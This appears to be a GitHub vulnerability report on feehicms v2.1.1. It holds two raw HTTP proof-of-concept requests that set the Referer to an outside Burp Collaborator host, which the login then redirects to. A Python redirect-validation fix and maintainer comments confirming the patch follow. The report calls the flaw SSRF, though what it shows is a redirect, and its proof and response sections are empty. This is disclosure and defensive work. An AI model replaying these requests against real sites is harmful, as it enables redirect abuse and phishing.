SSRF vulnerability in feehicms v2.1.1
This is a Server-Side Request Forgery vulnerability. We can change the HTTP Referer header to any URL, and the server will then request it. Details are as follows:
We need to send two requests.
1. First, register an account normally. Here my account is test123 and the password is 123456.
2. Log out of our account and log in again from the picture below.
Use Burp Suite to change the HTTP Referer header.
The first POC request is as follows:
```
GET http://demo.cms.feehi.com/index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://8oxj66ons65elf2qv4rtf9p7aygo4d.burpcollaborator.net
Cookie: PHPSESSID=qonm8i5t18ib80j9pd7dmashk5; _csrf=cda18c17fe47abcbb2087ab119b1eecbd6843d44869353569e637a9201e1d72ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-3hQu00puXWdYFwJBISJmdCQV3JNONUO%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1617248220; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1617254900; bdshare_firstime=1617249066528; Hm_lvt_949aa9449254cd665295a150d530d9c1=1617249086; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1617249086; BACKEND_FEEHICMS=s3gphj1i4fo2u6dq1kv127m711; _csrf_backend=b863ca10b196c0aa2b854de0b913dde6dee9e85eca6df36b82d4d93fdb8b944da%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22495TiL3mL5dkENl35cJv4JigTuVswDiS%22%3B%7D
Upgrade-Insecure-Requests: 1
```
3. Log in with our account and password.
Use Burp Suite; we don't modify anything.
The second POC request is as follows:
```
POST http://demo.cms.feehi.com/index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
Origin: http://demo.cms.feehi.com
Connection: close
Referer: http://demo.cms.feehi.com/index.php?r=site%2Flogin
Cookie: PHPSESSID=qonm8i5t18ib80j9pd7dmashk5; _csrf=cda18c17fe47abcbb2087ab119b1eecbd6843d44869353569e637a9201e1d72ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-3hQu00puXWdYFwJBISJmdCQV3JNONUO%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1617248220; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1617254930; bdshare_firstime=1617249066528; Hm_lvt_949aa9449254cd665295a150d530d9c1=1617249086; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1617249086; BACKEND_FEEHICMS=s3gphj1i4fo2u6dq1kv127m711; _csrf_backend=b863ca10b196c0aa2b854de0b913dde6dee9e85eca6df36b82d4d93fdb8b944da%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22495TiL3mL5dkENl35cJv4JigTuVswDiS%22%3B%7D
Upgrade-Insecure-Requests: 1
_csrf=kgPC6DtyS_hxWBm1BRhqtuxuO1lKLvtXbXluSk4cmje_MKq5TkJ7iAQATtFcXh38ridoEydKuAY7SiQEAVLPeA%3D%3D&LoginForm%5Busername%5D=test123&LoginForm%5Bpassword%5D=123456&LoginForm%5BrememberMe%5D=0&LoginForm%5BrememberMe%5D=1&login-button=
```
Then we found that the response to the second request contained a 302 redirect. The redirect URL is the Referer header of our first request.
The response to the second request is as follows:
4. Vulnerability proof
5. How to fix
https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
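The report above describes a login flow that remembers the Referer of an earlier request and issues a 302 to it after authentication, so an attacker-chosen header becomes the redirect target. As an added illustration of the mitigation (not feehicms's own PHP code; the host name is taken from the report and `safe_return_url` is a hypothetical helper), the check below only accepts same-origin targets and falls back to the site root for everything else:

```python
from urllib.parse import urlsplit

# Constructed example: the host the application is served from.
APP_HOST = "demo.cms.feehi.com"


def safe_return_url(candidate, app_host=APP_HOST, fallback="/"):
    """Return a post-login redirect target that stays on the application.

    The Referer header is attacker-controlled, so a remembered return URL
    must be validated before it is placed in a Location header. Only
    http(s) URLs whose host equals app_host, or single-slash absolute
    paths, are accepted; anything else yields the fallback path.
    """
    if not candidate:
        return fallback
    raw = candidate.strip()
    parts = urlsplit(raw)
    # Reject schemes other than http/https (javascript:, data:, ...).
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return fallback
    if parts.netloc:
        # Absolute or scheme-relative ("//host") URL: host must match.
        # parts.hostname strips userinfo, so "app@evil" resolves to "evil".
        if (parts.hostname or "").lower() != app_host.lower():
            return fallback
        path = parts.path or "/"
    else:
        # Relative target: must be a single-slash absolute path. "/\\host"
        # is rejected because some browsers treat it like "//host".
        if not raw.startswith("/") or raw.startswith(("//", "/\\")):
            return fallback
        path = parts.path
    if "\\" in path:
        return fallback
    # Rebuild a relative target so the scheme and host are never echoed.
    target = path
    if parts.query:
        target += "?" + parts.query
    if parts.fragment:
        target += "#" + parts.fragment
    return target
```

Applied to the first POC request, the Burp Collaborator Referer is discarded and the redirect goes to "/" instead of the external host.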
Hi, This issue was assigned with CVE-2021-30108. Was it ever addressed / fixed?
It hasn't been fixed yet.
@Jason1314Zhang https://github.com/liufee/cms/commit/d45cb9cb26d6f5ef491fa2c7d87ac7f26091bd7c Hi, thanks for your feedback. The security problem has been fixed.